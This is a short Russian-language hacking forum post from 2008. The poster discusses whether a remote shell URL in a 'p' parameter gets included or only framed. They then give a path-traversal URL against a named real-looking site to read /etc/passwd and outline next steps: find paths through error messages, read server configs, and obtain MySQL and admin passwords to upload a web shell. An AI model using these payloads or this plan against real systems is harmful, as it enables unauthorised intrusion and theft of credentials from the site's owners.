Показать сообщение отдельно

  #11  
Старый 11.12.2008, 14:22
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

rip86
http://сайт/index.php?p=http://шелл.txt - это видимо просто фрейм или чтто типо того ..
инклуд шелла, происходит если в скрипте было бы прописано include($_GET['p']); или нечто подобное ..
а тут чтото вроде echo '<iframe src="'.$_GET['p'].'"></iframe>';
---------
http://www.pep.spb.org/index.php?p=../../../../../../../../../../../../../etc/passwd
ну конечно смотря какие права есть .. но можно найти пути по ошибкам, потом поискать конфы сервера, пассы от мускуля/админок чтоб шелл залить ..
 
Ответить с цитированием